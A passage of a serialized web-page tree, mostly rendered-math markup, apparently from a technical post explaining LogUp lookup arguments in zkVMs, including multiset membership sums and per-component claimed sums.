dren":119960},{"className":119959,"style":118999},[118929],[119961],{"type":24,"tag":301,"props":119962,"children":119964},{"className":119963,"style":119005},[119004],[119965],{"type":24,"tag":41022,"props":119966,"children":119967},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119968],{"type":24,"tag":119017,"props":119969,"children":119970},{"d":119019},[],{"type":30,"value":119972}," is sampled before those values are bound, an attacker can reprogram values while preserving the same evaluated claim.",{"type":24,"tag":80,"props":119974,"children":119976},{"id":119975},"lookup-arguments-logup",[119977],{"type":30,"value":119978},"Lookup Arguments (LogUp)",{"type":24,"tag":32,"props":119980,"children":119981},{},[119982],{"type":30,"value":119983},"zkVMs need to check that values satisfy certain properties. For example:",{"type":24,"tag":2655,"props":119985,"children":119986},{},[119987,120042,120047],{"type":24,"tag":2659,"props":119988,"children":119989},{},[119990,119992,120041],{"type":30,"value":119991},"Is this byte in range ",{"type":24,"tag":145,"props":119993,"children":119995},{"className":119994},[10807,10808],[119996],{"type":24,"tag":301,"props":119997,"children":119999},{"className":119998},[10813],[120000],{"type":24,"tag":301,"props":120001,"children":120003},{"className":120002,"ariaHidden":10819},[10818],[120004],{"type":24,"tag":301,"props":120005,"children":120007},{"className":120006},[10824],[120008,120012,120017,120022,120027,120031,120036],{"type":24,"tag":301,"props":120009,"children":120011},{"className":120010,"style":10935},[10829],[],{"type":24,"tag":301,"props":120013,"children":120015},{"className":120014},[28486],[120016],{"type":30,"value":541},{"type":24,"tag":301,"props":120018,"children":120020},{"className":120019},[10835],[120021],{"type":30,"value":584},{"type":24,"tag":301,"props":120023,"children":120025},{"className":120024},[10946],[120026],{"type":30,"value":10949},{"type":24,"tag":301,"props":120028,"children":120030},{"className":120029,"style":10953},[10914],[],{"type":24,"tag":301,"props":120032,"children":120034},{"className":120033},[10835],[120035],{"type":30,"value":2052},{"type":24,"tag":301,"props":120037,"children":120039},{"className":120038},[28508],[120040],{"type":30,"value":22200},{"type":30,"value":2003},{"type":24,"tag":2659,"props":120043,"children":120044},{},[120045],{"type":30,"value":120046},"Does this opcode decode correctly?",{"type":24,"tag":2659,"props":120048,"children":120049},{},[120050],{"type":30,"value":120051},"Is this memory access consistent with previous accesses?",{"type":24,"tag":32,"props":120053,"children":120054},{},[120055,120060],{"type":24,"tag":60,"props":120056,"children":120057},{},[120058],{"type":30,"value":120059},"The naive approach:",{"type":30,"value":120061}," Add constraints for each check. Expensive.",{"type":24,"tag":32,"props":120063,"children":120064},{},[120065,120070,120072,120077],{"type":24,"tag":60,"props":120066,"children":120067},{},[120068],{"type":30,"value":120069},"The clever approach:",{"type":30,"value":120071}," Precompute a table of valid tuples. Prove that every value the program uses appears in the table. This is a ",{"type":24,"tag":60,"props":120073,"children":120074},{},[120075],{"type":30,"value":120076},"multiset membership",{"type":30,"value":74508},{"type":24,"tag":32,"props":120079,"children":120080},{},[120081,120086],{"type":24,"tag":60,"props":120082,"children":120083},{},[120084],{"type":30,"value":120085},"LogUp (Logarithmic Derivative):",{"type":30,"value":120087}," Encode multiset membership as a sum of fractions.",{"type":24,"tag":32,"props":120089,"children":120090},{},[120091,120093,120118,120120,120147],{"type":30,"value":120092},"If set ",{"type":24,"tag":145,"props":120094,"children":120096},{"className":120095},[10807,10808],[120097],{"type":24,"tag":301,"props":120098,"children":120100},{"className":120099},[10813],[120101],{"type":24,"tag":301,"props":120102,"children":120104},{"className":120103,"ariaHidden":10819},[10818],[120105],{"type":24,"tag":301,"props":120106,"children":120108},{"className":120107},[10824],[120109,120113],{"type":24,"tag":301,"props":120110,"children":120112},{"className":120111,"style":28352},[10829],[],{"type":24,"tag":301,"props":120114,"children":120116},{"className":120115},[10835,28357],[120117],{"type":30,"value":83479},{"type":30,"value":120119}," should equal set ",{"type":24,"tag":145,"props":120121,"children":120123},{"className":120122},[10807,10808],[120124],{"type":24,"tag":301,"props":120125,"children":120127},{"className":120126},[10813],[120128],{"type":24,"tag":301,"props":120129,"children":120131},{"className":120130,"ariaHidden":10819},[10818],[120132],{"type":24,"tag":301,"props":120133,"children":120135},{"className":120134},[10824],[120136,120140],{"type":24,"tag":301,"props":120137,"children":120139},{"className":120138,"style":28352},[10829],[],{"type":24,"tag":301,"props":120141,"children":120144},{"className":120142,"style":120143},[10835,28357],"margin-right:0.05017em;",[120145],{"type":30,"value":120146},"B",{"type":30,"value":120148}," as multisets:",{"type":24,"tag":32,"props":120150,"children":120151},{},[120152],{"type":24,"tag":145,"props":120153,"children":120155},{"className":120154},[10807,10808],[120156],{"type":24,"tag":301,"props":120157,"children":120159},{"className":120158},[10813],[120160],{"type":24,"tag":301,"props":120161,"children":120163},{"className":120162,"ariaHidden":10819},[10818],[120164,120379],{"type":24,"tag":301,"props":120165,"children":120167},{"className":120166},[10824],[120168,120173,120246,120250,120366,120370,120375],{"type":24,"tag":301,"props":120169,"children":120172},{"className":120170,"style":120171},[10829],"height:1.2484em;vertical-align:-0.4033em;",[],{"type":24,"tag":301,"props":120174,"children":120176},{"className":120175},[28393],[120177,120182],{"type":24,"tag":301,"props":120178,"children":120180},{"className":120179,"style":28400},[28393,28398,28399],[120181],{"type":30,"value":115536},{"type":24,"tag":301,"props":120183,"children":120185},{"className":120184},[10850],[120186],{"type":24,"tag":301,"props":120187,"children":120189},{"className":120188},[10855,28411],[120190,120234],{"type":24,"tag":301,"props":120191,"children":120193},{"className":120192},[10860],[120194,120229],{"type":24,"tag":301,"props":120195,"children":120198},{"className":120196,"style":120197},[10865],"height:0.1786em;",[120199],{"type":24,"tag":301,"props":120200,"children":120201},{"style":28424},[120202,120206],{"type":24,"tag":301,"props":120203,"children":120205},{"className":120204,"style":10875},[10874],[],{"type":24,"tag":301,"props":120207,"children":120209},{"className":120208},[10880,10881,10882,10883],[120210],{"type":24,"tag":301,"props":120211,"children":120213},{"className":120212},[10835,10883],[120214,120219,120224],{"type":24,"tag":301,"props":120215,"children":120217},{"className":120216},[10835,28357,10883],[120218],{"type":30,"value":188},{"type":24,"tag":301,"props":120220,"children":120222},{"className":120221},[11017,10883],[120223],{"type":30,"value":28464},{"type":24,"tag":301,"props":120225,"children":120227},{"className":120226},[10835,28357,10883],[120228],{"type":30,"value":83479},{"type":24,"tag":301,"props":120230,"children":120232},{"className":120231},[28514],[120233],{"type":30,"value":28517},{"type":24,"tag":301,"props":120235,"children":120237},{"className":120236},[10860],[120238],{"type":24,"tag":301,"props":120239,"children":120242},{"className":120240,"style":120241},[10865],"height:0.3271em;",[120243],{"type":24,"tag":301,"props":120244,"children":120245},{},[],{"type":24,"tag":301,"props":120247,"children":120249},{"className":120248,"style":10953},[10914],[],{"type":24,"tag":301,"props":120251,"children":120253},{"className":120252},[10835],[120254,120259,120362],{"type":24,"tag":301,"props":120255,"children":120258},{"className":120256},[28486,120257],"nulldelimiter",[],{"type":24,"tag":301,"props":120260,"children":120263},{"className":120261},[120262],"mfrac",[120264],{"type":24,"tag":301,"props":120265,"children":120267},{"className":120266},[10855,28411],[120268,120350],{"type":24,"tag":301,"props":120269,"children":120271},{"className":120270},[10860],[120272,120345],{"type":24,"tag":301,"props":120273,"children":120276},{"className":120274,"style":120275},[10865],"height:0.8451em;",[120277,120310,120324],{"type":24,"tag":301,"props":120278,"children":120280},{"style":120279},"top:-2.655em;",[120281,120285],{"type":24,"tag":301,"props":120282,"children":120284},{"className":120283,"style":118911},[10874],[],{"type":24,"tag":301,"props":120286,"children":120288},{"className":120287},[10880,10881,10882,10883],[120289],{"type":24,"tag":301,"props":120290,"children":120292},{"className":120291},[10835,10883],[120293,120300,120305],{"type":24,"tag":301,"props":120294,"children":120297},{"className":120295,"style":120296},[10835,28357,10883],"margin-right:0.04398em;",[120298],{"type":30,"value":120299},"z",{"type":24,"tag":301,"props":120301,"children":120303},{"className":120302},[10920,10883],[120304],{"type":30,"value":10894},{"type":24,"tag":301,"props":120306,"children":120308},{"className":120307},[10835,28357,10883],[120309],{"type":30,"value":188},{"type":24,"tag":301,"props":120311,"children":120313},{"style":120312},"top:-3.23em;",[120314,120318],{"type":24,"tag":301,"props":120315,"children":120317},{"className":120316,"style":118911},[10874],[],{"type":24,"tag":301,"props":120319,"children":120323},{"className":120320,"style":120322},[120321],"frac-line","border-bottom-width:0.04em;",[],{"type":24,"tag":301,"props":120325,"children":120327},{"style":120326},"top:-3.394em;",[120328,120332],{"type":24,"tag":301,"props":120329,"children":120331},{"className":120330,"style":118911},[10874],[],{"type":24,"tag":301,"props":120333,"children":120335},{"className":120334},[10880,10881,10882,10883],[120336],{"type":24,"tag":301,"props":120337,"children":120339},{"className":120338},[10835,10883],[120340],{"type":24,"tag":301,"props":120341,"children":120343},{"className":120342},[10835,10883],[120344],{"type":30,"value":546},{"type":24,"tag":301,"props":120346,"children":120348},{"className":120347},[28514],[120349],{"type":30,"value":28517},{"type":24,"tag":301,"props":120351,"children":120353},{"className":120352},[10860],[120354],{"type":24,"tag":301,"props":120355,"children":120358},{"className":120356,"style":120357},[10865],"height:0.4033em;",[120359],{"type":24,"tag":301,"props":120360,"children":120361},{},[],{"type":24,"tag":301,"props":120363,"children":120365},{"className":120364},[28508,120257],[],{"type":24,"tag":301,"props":120367,"children":120369},{"className":120368,"style":11012},[10914],[],{"type":24,"tag":301,"props":120371,"children":120373},{"className":120372},[11017],[120374],{"type":30,"value":523},{"type":24,"tag":301,"props":120376,"children":120378},{"className":120377,"style":11012},[10914],[],{"type":24,"tag":301,"props":120380,"children":120382},{"className":120381},[10824],[120383,120387,120459,120463],{"type":24,"tag":301,"props":120384,"children":120386},{"className":120385,"style":120171},[10829],[],{"type":24,"tag":301,"props":120388,"children":120390},{"className":120389},[28393],[120391,120396],{"type":24,"tag":301,"props":120392,"children":120394},{"className":120393,"style":28400},[28393,28398,28399],[120395],{"type":30,"value":115536},{"type":24,"tag":301,"props":120397,"children":120399},{"className":120398},[10850],[120400],{"type":24,"tag":301,"props":120401,"children":120403},{"className":120402},[10855,28411],[120404,120448],{"type":24,"tag":301,"props":120405,"children":120407},{"className":120406},[10860],[120408,120443],{"type":24,"tag":301,"props":120409,"children":120412},{"className":120410,"style":120411},[10865],"height:0.1864em;",[120413],{"type":24,"tag":301,"props":120414,"children":120415},{"style":28424},[120416,120420],{"type":24,"tag":301,"props":120417,"children":120419},{"className":120418,"style":10875},[10874],[],{"type":24,"tag":301,"props":120421,"children":120423},{"className":120422},[10880,10881,10882,10883],[120424],{"type":24,"tag":301,"props":120425,"children":120427},{"className":120426},[10835,10883],[120428,120433,120438],{"type":24,"tag":301,"props":120429,"children":120431},{"className":120430},[10835,28357,10883],[120432],{"type":30,"value":5613},{"type":24,"tag":301,"props":120434,"children":120436},{"className":120435},[11017,10883],[120437],{"type":30,"value":28464},{"type":24,"tag":301,"props":120439,"children":120441},{"className":120440,"style":120143},[10835,28357,10883],[120442],{"type":30,"value":120146},{"type":24,"tag":301,"props":120444,"children":120446},{"className":120445},[28514],[120447],{"type":30,"value":28517},{"type":24,"tag":301,"props":120449,"children":120451},{"className":120450},[10860],[120452],{"type":24,"tag":301,"props":120453,"children":120455},{"className":120454,"style":120241},[10865],[120456],{"type":24,"tag":301,"props":120457,"children":120458},{},[],{"type":24,"tag":301,"props":120460,"children":120462},{"className":120461,"style":10953},[10914],[],{"type":24,"tag":301,"props":120464,"children":120466},{"className":120465},[10835],[120467,120471,120564],{"type":24,"tag":301,"props":120468,"children":120470},{"className":120469},[28486,120257],[],{"type":24,"tag":301,"props":120472,"children":120474},{"className":120473},[120262],[120475],{"type":24,"tag":301,"props":120476,"children":120478},{"className":120477},[10855,28411],[120479,120553],{"type":24,"tag":301,"props":120480,"children":120482},{"className":120481},[10860],[120483,120548],{"type":24,"tag":301,"props":120484,"children":120486},{"className":120485,"style":120275},[10865],[120487,120517,120528],{"type":24,"tag":301,"props":120488,"children":120489},{"style":120279},[120490,120494],{"type":24,"tag":301,"props":120491,"children":120493},{"className":120492,"style":118911},[10874],[],{"type":24,"tag":301,"props":120495,"children":120497},{"className":120496},[10880,10881,10882,10883],[120498],{"type":24,"tag":301,"props":120499,"children":120501},{"className":120500},[10835,10883],[120502,120507,120512],{"type":24,"tag":301,"props":120503,"children":120505},{"className":120504,"style":120296},[10835,28357,10883],[120506],{"type":30,"value":120299},{"type":24,"tag":301,"props":120508,"children":120510},{"className":120509},[10920,10883],[120511],{"type":30,"value":10894},{"type":24,"tag":301,"props":120513,"children":120515},{"className":120514},[10835,28357,10883],[120516],{"type":30,"value":5613},{"type":24,"tag":301,"props":120518,"children":120519},{"style":120312},[120520,120524],{"type":24,"tag":301,"props":120521,"children":120523},{"className":120522,"style":118911},[10874],[],{"type":24,"tag":301,"props":120525,"children":120527},{"className":120526,"style":120322},[120321],[],{"type":24,"tag":301,"props":120529,"children":120530},{"style":120326},[120531,120535],{"type":24,"tag":301,"props":120532,"children":120534},{"className":120533,"style":118911},[10874],[],{"type":24,"tag":301,"props":120536,"children":120538},{"className":120537},[10880,10881,10882,10883],[120539],{"type":24,"tag":301,"props":120540,"children":120542},{"className":120541},[10835,10883],[120543],{"type":24,"tag":301,"props":120544,"children":120546},{"className":120545},[10835,10883],[120547],{"type":30,"value":546},{"type":24,"tag":301,"props":120549,"children":120551},{"className":120550},[28514],[120552],{"type":30,"value":28517},{"type":24,"tag":301,"props":120554,"children":120556},{"className":120555},[10860],[120557],{"type":24,"tag":301,"props":120558,"children":120560},{"className":120559,"style":120357},[10865],[120561],{"type":24,"tag":301,"props":120562,"children":120563},{},[],{"type":24,"tag":301,"props":120565,"children":120567},{"className":120566},[28508,120257],[],{"type":24,"tag":32,"props":120569,"children":120570},{},[120571,120573,120598],{"type":30,"value":120572},"for random challenge ",{"type":24,"tag":145,"props":120574,"children":120576},{"className":120575},[10807,10808],[120577],{"type":24,"tag":301,"props":120578,"children":120580},{"className":120579},[10813],[120581],{"type":24,"tag":301,"props":120582,"children":120584},{"className":120583,"ariaHidden":10819},[10818],[120585],{"type":24,"tag":301,"props":120586,"children":120588},{"className":120587},[10824],[120589,120593],{"type":24,"tag":301,"props":120590,"children":120592},{"className":120591,"style":117581},[10829],[],{"type":24,"tag":301,"props":120594,"children":120596},{"className":120595,"style":120296},[10835,28357],[120597],{"type":30,"value":120299},{"type":30,"value":120599},". If the multisets match, the sums are equal. If they differ, the sums differ with overwhelming probability.",{"type":24,"tag":32,"props":120601,"children":120602},{},[120603,120608],{"type":24,"tag":60,"props":120604,"children":120605},{},[120606],{"type":30,"value":120607},"In zkVMs:",{"type":30,"value":120609}," Different components emit and consume lookup tuples:",{"type":24,"tag":2655,"props":120611,"children":120612},{},[120613,120700],{"type":24,"tag":2659,"props":120614,"children":120615},{},[120616,120618,120644,120646,120671,120673,120699],{"type":30,"value":120617},"CPU emits: \"I read value ",{"type":24,"tag":145,"props":120619,"children":120621},{"className":120620},[10807,10808],[120622],{"type":24,"tag":301,"props":120623,"children":120625},{"className":120624},[10813],[120626],{"type":24,"tag":301,"props":120627,"children":120629},{"className":120628,"ariaHidden":10819},[10818],[120630],{"type":24,"tag":301,"props":120631,"children":120633},{"className":120632},[10824],[120634,120638],{"type":24,"tag":301,"props":120635,"children":120637},{"className":120636,"style":117581},[10829],[],{"type":24,"tag":301,"props":120639,"children":120641},{"className":120640,"style":100230},[10835,28357],[120642],{"type":30,"value":120643},"v",{"type":30,"value":120645}," from address ",{"type":24,"tag":145,"props":120647,"children":120649},{"className":120648},[10807,10808],[120650],{"type":24,"tag":301,"props":120651,"children":120653},{"className":120652},[10813],[120654],{"type":24,"tag":301,"props":120655,"children":120657},{"className":120656,"ariaHidden":10819},[10818],[120658],{"type":24,"tag":301,"props":120659,"children":120661},{"className":120660},[10824],[120662,120666],{"type":24,"tag":301,"props":120663,"children":120665},{"className":120664,"style":117581},[10829],[],{"type":24,"tag":301,"props":120667,"children":120669},{"className":120668},[10835,28357],[120670],{"type":30,"value":188},{"type":30,"value":120672}," at time ",{"type":24,"tag":145,"props":120674,"children":120676},{"className":120675},[10807,10808],[120677],{"type":24,"tag":301,"props":120678,"children":120680},{"className":120679},[10813],[120681],{"type":24,"tag":301,"props":120682,"children":120684},{"className":120683,"ariaHidden":10819},[10818],[120685],{"type":24,"tag":301,"props":120686,"children":120688},{"className":120687},[10824],[120689,120694],{"type":24,"tag":301,"props":120690,"children":120693},{"className":120691,"style":120692},[10829],"height:0.6151em;",[],{"type":24,"tag":301,"props":120695,"children":120697},{"className":120696},[10835,28357],[120698],{"type":30,"value":28499},{"type":30,"value":9408},{"type":24,"tag":2659,"props":120701,"children":120702},{},[120703,120705,120730,120732,120757,120759,120784],{"type":30,"value":120704},"Memory table consumes: \"At time ",{"type":24,"tag":145,"props":120706,"children":120708},{"className":120707},[10807,10808],[120709],{"type":24,"tag":301,"props":120710,"children":120712},{"className":120711},[10813],[120713],{"type":24,"tag":301,"props":120714,"children":120716},{"className":120715,"ariaHidden":10819},[10818],[120717],{"type":24,"tag":301,"props":120718,"children":120720},{"className":120719},[10824],[120721,120725],{"type":24,"tag":301,"props":120722,"children":120724},{"className":120723,"style":120692},[10829],[],{"type":24,"tag":301,"props":120726,"children":120728},{"className":120727},[10835,28357],[120729],{"type":30,"value":28499},{"type":30,"value":120731},", address ",{"type":24,"tag":145,"props":120733,"children":120735},{"className":120734},[10807,10808],[120736],{"type":24,"tag":301,"props":120737,"children":120739},{"className":120738},[10813],[120740],{"type":24,"tag":301,"props":120741,"children":120743},{"className":120742,"ariaHidden":10819},[10818],[120744],{"type":24,"tag":301,"props":120745,"children":120747},{"className":120746},[10824],[120748,120752],{"type":24,"tag":301,"props":120749,"children":120751},{"className":120750,"style":117581},[10829],[],{"type":24,"tag":301,"props":120753,"children":120755},{"className":120754},[10835,28357],[120756],{"type":30,"value":188},{"type":30,"value":120758}," contained ",{"type":24,"tag":145,"props":120760,"children":120762},{"className":120761},[10807,10808],[120763],{"type":24,"tag":301,"props":120764,"children":120766},{"className":120765},[10813],[120767],{"type":24,"tag":301,"props":120768,"children":120770},{"className":120769,"ariaHidden":10819},[10818],[120771],{"type":24,"tag":301,"props":120772,"children":120774},{"className":120773},[10824],[120775,120779],{"type":24,"tag":301,"props":120776,"children":120778},{"className":120777,"style":117581},[10829],[],{"type":24,"tag":301,"props":120780,"children":120782},{"className":120781,"style":100230},[10835,28357],[120783],{"type":30,"value":120643},{"type":30,"value":9408},{"type":24,"tag":32,"props":120786,"children":120787},{},[120788],{"type":30,"value":120789},"If everything balances, the execution is consistent.",{"type":24,"tag":32,"props":120791,"children":120792},{},[120793,120798],{"type":24,"tag":60,"props":120794,"children":120795},{},[120796],{"type":30,"value":120797},"The claimed_sum:",{"type":30,"value":120799}," Each component computes its contribution to the LogUp sum:",{"type":24,"tag":32,"props":120801,"children":120802},{},[120803],{"type":24,"tag":145,"props":120804,"children":120806},{"className":120805},[10807,10808],[120807],{"type":24,"tag":301,"props":120808,"children":120810},{"className":120809},[10813],[120811],{"type":24,"tag":301,"props":120812,"children":120814},{"className":120813,"ariaHidden":10819},[10818],[120815,120913,121164],{"type":24,"tag":301,"props":120816,"children":120818},{"className":120817},[10824],[120819,120823,120833,120838,120900,120904,120909],{"type":24,"tag":301,"props":120820,"children":120822},{"className":120821,"style":101157},[10829],[],{"type":24,"tag":301,"props":120824,"children":120826},{"className":120825},[10835,30],[120827],{"type":24,"tag":301,"props":120828,"children":120830},{"className":120829},[10835],[120831],{"type":30,"value":120832},"claimed",{"type":24,"tag":301,"props":120834,"children":120836},{"className":120835,"style":99745},[10835],[120837],{"type":30,"value":9918},{"type":24,"tag":301,"props":120839,"children":120841},{"className":120840},[10835],[120842,120851],{"type":24,"tag":301,"props":120843,"children":120845},{"className":120844},[10835,30],[120846],{"type":24,"tag":301,"props":120847,"children":120849},{"className":120848},[10835],[120850],{"type":30,"value":83344},{"type":24,"tag":301,"props":120852,"children":120854},{"className":120853},[10850],[120855],{"type":24,"tag":301,"props":120856,"children":120858},{"className":120857},[10855,28411],[120859,120889],{"type":24,"tag":301,"props":120860,"children":120862},{"className":120861},[10860],[120863,120884],{"type":24,"tag":301,"props":120864,"children":120866},{"className":120865,"style":100273},[10865],[120867],{"type":24,"tag":301,"props":120868,"children":120870},{"style":120869},"top:-2.55em;margin-right:0.05em;",[120871,120875],{"type":24,"tag":301,"props":120872,"children":120874},{"className":120873,"style":10875},[10874],[],{"type":24,"tag":301,"props":120876,"children":120878},{"className":120877},[10880,10881,10882,10883],[120879],{"type":24,"tag":301,"props":120880,"children":120882},{"className":120881},[10835,28357,10883],[120883],{"type":30,"value":10564},{"type":24,"tag":301,"props":120885,"children":120887},{"className":120886},[28514],[120888],{"type":30,"value":28517},{"type":24,"tag":301,"props":120890,"children":120892},{"className":120891},[10860],[120893],{"type":24,"tag":301,"props":120894,"children":120896},{"className":120895,"style":99828},[10865],[120897],{"type":24,"tag":301,"props":120898,"children":120899},{},[],{"type":24,"tag":301,"props":120901,"children":120903},{"className":120902,"style":11012},[10914],[],{"type":24,"tag":301,"props":120905,"children":120907},{"className":120906},[11017],[120908],{"type":30,"value":523},{"type":24,"tag":301,"props":120910,"children":120912},{"className":120911,"style":11012},[10914],[],{"type":24,"tag":301,"props":120914,"children":120916},{"className":120915},[10824],[120917,120922,120982,120986,121151,121155,121160],{"type":24,"tag":301,"props":120918,"children":120921},{"className":120919,"style":120920},[10829],"height:1.3874em;vertical-align:-0.5423em;",[],{"type":24,"tag":301,"props":120923,"children":120925},{"className":120924},[28393],[120926,120931],{"type":24,"tag":301,"props":120927,"children":120929},{"className":120928,"style":28400},[28393,28398,28399],[120930],{"type":30,"value":115536},{"type":24,"tag":301,"props":120932,"children":120934},{"className":120933},[10850],[120935],{"type":24,"tag":301,"props":120936,"children":120938},{"className":120937},[10855,28411],[120939,120970],{"type":24,"tag":301,"props":120940,"children":120942},{"className":120941},[10860],[120943,120965],{"type":24,"tag":301,"props":120944,"children":120947},{"className":120945,"style":120946},[10865],"height:0.162em;",[120948],{"type":24,"tag":301,"props":120949,"children":120950},{"style":28424},[120951,120955],{"type":24,"tag":301,"props":120952,"children":120954},{"className":120953,"style":10875},[10874],[],{"type":24,"tag":301,"props":120956,"children":120958},{"className":120957},[10880,10881,10882,10883],[120959],{"type":24,"tag":301,"props":120960,"children":120963},{"className":120961,"style":120962},[10835,28357,10883],"margin-right:0.05724em;",[120964],{"type":30,"value":15470},{"type":24,"tag":301,"props":120966,"children":120968},{"className":120967},[28514],[120969],{"type":30,"value":28517},{"type":24,"tag":301,"props":120971,"children":120973},{"className":120972},[10860],[120974],{"type":24,"tag":301,"props":120975,"children":120978},{"className":120976,"style":120977},[10865],"height:0.4358em;",[120979],{"type":24,"tag":301,"props":120980,"children":120981},{},[],{"type":24,"tag":301,"props":120983,"children":120985},{"className":120984,"style":10953},[10914],[],{"type":24,"tag":301,"props":120987,"children":120989},{"className":120988},[10835],[120990,120994,121147],{"type":24,"tag":301,"props":120991,"children":120993},{"className":120992},[28486,120257],[],{"type":24,"tag":301,"props":120995,"children":120997},{"className":120996},[120262],[120998],{"type":24,"tag":301,"props":120999,"children":121001},{"className":121000},[10855,28411],[121002,121135],{"type":24,"tag":301,"props":121003,"children":121005},{"className":121004},[10860],[121006,121130],{"type":24,"tag":301,"props":121007,"children":121009},{"className":121008,"style":120275},[10865],[121010,121099,121110],{"type":24,"tag":301,"props":121011,"children":121012},{"style":120279},[121013,121017],{"type":24,"tag":301,"props":121014,"children":121016},{"className":121015,"style":118911},[10874],[],{"type":24,"tag":301,"props":121018,"children":121020},{"className":121019},[10880,10881,10882,10883],[121021],{"type":24,"tag":301,"props":121022,"children":121024},{"className":121023},[10835,10883],[121025,121030,121035],{"type":24,"tag":301,"props":121026,"children":121028},{"className":121027,"style":120296},[10835,28357,10883],[121029],{"type":30,"value":120299},{"type":24,"tag":301,"props":121031,"children":121033},{"className":121032},[10920,10883],[121034],{"type":30,"value":10894},{"type":24,"tag":301,"props":121036,"children":121038},{"className":121037},[10835,10883],[121039,121048],{"type":24,"tag":301,"props":121040,"children":121042},{"className":121041},[10835,30,10883],[121043],{"type":24,"tag":301,"props":121044,"children":121046},{"className":121045},[10835,10883],[121047],{"type":30,"value":68720},{"type":24,"tag":301,"props":121049,"children":121051},{"className":121050},[10850],[121052],{"type":24,"tag":301,"props":121053,"children":121055},{"className":121054},[10855,28411],[121056,121087],{"type":24,"tag":301,"props":121057,"children":121059},{"className":121058},[10860],[121060,121082],{"type":24,"tag":301,"props":121061,"children":121064},{"className":121062,"style":121063},[10865],"height:0.3281em;",[121065],{"type":24,"tag":301,"props":121066,"children":121068},{"style":121067},"top:-2.357em;margin-right:0.0714em;",[121069,121073],{"type":24,"tag":301,"props":121070,"children":121072},{"className":121071,"style":115601},[10874],[],{"type":24,"tag":301,"props":121074,"children":121076},{"className":121075},[10880,115606,115607,10883],[121077],{"type":24,"tag":301,"props":121078,"children":121080},{"className":121079,"style":120962},[10835,28357,10883],[121081],{"type":30,"value":15470},{"type":24,"tag":301,"props":121083,"children":121085},{"className":121084},[28514],[121086],{"type":30,"value":28517},{"type":24,"tag":301,"props":121088,"children":121090},{"className":121089},[10860],[121091],{"type":24,"tag":301,"props":121092,"children":121095},{"className":121093,"style":121094},[10865],"height:0.2819em;",[121096],{"type":24,"tag":301,"props":121097,"children":121098},{},[],{"type":24,"tag":301,"props":121100,"children":121101},{"style":120312},[121102,121106],{"type":24,"tag":301,"props":121103,"children":121105},{"className":121104,"style":118911},[10874],[],{"type":24,"tag":301,"props":121107,"children":121109},{"className":121108,"style":120322},[120321],[],{"type":24,"tag":301,"props":121111,"children":121112},{"style":120326},[121113,121117],{"type":24,"tag":301,"props":121114,"children":121116},{"className":121115,"style":118911},[10874],[],{"type":24,"tag":301,"props":121118,"children":121120},{"className":121119},[10880,10881,10882,10883],[121121],{"type":24,"tag":301,"props":121122,"children":121124},{"className":121123},[10835,10883],[121125],{"type":24,"tag":301,"props":121126,"children":121128},{"className":121127},[10835,10883],[121129],{"type":30,"value":546},{"type":24,"tag":301,"props":121131,"children":121133},{"className":121132},[28514],[121134],{"type":30,"value":28517},{"type":24,"tag":301,"props":121136,"children":121138},{"className":121137},[10860],[121139],{"type":24,"tag":301,"props":121140,"children":121143},{"className":121141,"style":121142},[10865],"height:0.5423em;",[121144],{"type":24,"tag":301,"props":121145,"children":121146},{},[],{"type":24,"tag":301,"props":121148,"children":121150},{"className":121149},[28508,120257],[],{"type":24,"tag":301,"props":121152,"children":121154},{"className":121153,"style":10915},[10914],[],{"type":24,"tag":301,"props":121156,"children":121158},{"className":121157},[10920],[121159],{"type":30,"value":10894},{"type":24,"tag":301,"props":121161,"children":121163},{"className":121162,"style":10915},[10914],[],{"type":24,"tag":301,"props":121165,"children":121167},{"className":121166},[10824],[121168,121173,121231,121235],{"type":24,"tag":301,"props":121169,"children":121172},{"className":121170,"style":121171},[10829],"height:1.296em;vertical-align:-0.4509em;",[],{"type":24,"tag":301,"props":121174,"children":121176},{"className":121175},[28393],[121177,121182],{"type":24,"tag":301,"props":121178,"children":121180},{"className":121179,"style":28400},[28393,28398,28399],[121181],{"type":30,"value":115536},{"type":24,"tag":301,"props":121183,"children":121185},{"className":121184},[10850],[121186],{"type":24,"tag":301,"props":121187,"children":121189},{"className":121188},[10855,28411],[121190,121219],{"type":24,"tag":301,"props":121191,"children":121193},{"className":121192},[10860],[121194,121214],{"type":24,"tag":301,"props":121195,"children":121197},{"className":121196,"style":120411},[10865],[121198],{"type":24,"tag":301,"props":121199,"children":121200},{"style":28424},[121201,121205],{"type":24,"tag":301,"props":121202,"children":121204},{"className":121203,"style":10875},[10874],[],{"type":24,"tag":301,"props":121206,"children":121208},{"className":121207},[10880,10881,10882,10883],[121209],{"type":24,"tag":301,"props":121210,"children":121212},{"className":121211,"style":101173},[10835,28357,10883],[121213],{"type":30,"value":95387},{"type":24,"tag":301,"props":121215,"children":121217},{"className":121216},[28514],[121218],{"type":30,"value":28517},{"type":24,"tag":301,"props":121220,"children":121222},{"className":121221},[10860],[121223],{"type":24,"tag":301,"props":121224,"children":121227},{"className":121225,"style":121226},[10865],"height:0.2997em;",[121228],{"type":24,"tag":301,"props":121229,"children":121230},{},[],{"type":24,"tag":301,"props":121232,"children":121234},{"className":121233,"style":10953},[10914],[],{"type":24,"tag":301,"props":121236,"children":121238},{"className":121237},[10835],[121239,121243,121396],{"type":24,"tag":301,"props":121240,"children":121242},{"className":121241},[28486,120257],[],{"type":24,"tag":301,"props":121244,"children":121246},{"className":121245},[120262],[121247],{"type":24,"tag":301,"props":121248,"children":121250},{"className":121249},[10855,28411],[121251,121384],{"type":24,"tag":301,"props":121252,"children":121254},{"className":121253},[10860],[121255,121379],{"type":24,"tag":301,"props":121256,"children":121258},{"className":121257,"style":120275},[10865],[121259,121348,121359],{"type":24,"tag":301,"props":121260,"children":121261},{"style":120279},[121262,121266],{"type":24,"tag":301,"props":121263,"children":121265},{"className":121264,"style":118911},[10874],[],{"type":24,"tag":301,"props":121267,"children":121269},{"className":121268},[10880,10881,10882,10883],[121270],{"type":24,"tag":301,"props":121271,"children":121273},{"className":121272},[10835,10883],[121274,121279,121284],{"type":24,"tag":301,"props":121275,"children":121277},{"className":121276,"style":120296},[10835,28357,10883],[121278],{"type":30,"value":120299},{"type":24,"tag":301,"props":121280,"children":121282},{"className":121281},[10920,10883],[121283],{"type":30,"value":10894},{"type":24,"tag":301,"props":121285,"children":121287},{"className":121286},[10835,10883],[121288,121298],{"type":24,"tag":301,"props":121289,"children":121291},{"className":121290},[10835,30,10883],[121292],{"type":24,"tag":301,"props":121293,"children":121295},{"className":121294},[10835,10883],[121296],{"type":30,"value":121297},"consume",{"type":24,"tag":301,"props":121299,"children":121301},{"className":121300},[10850],[121302],{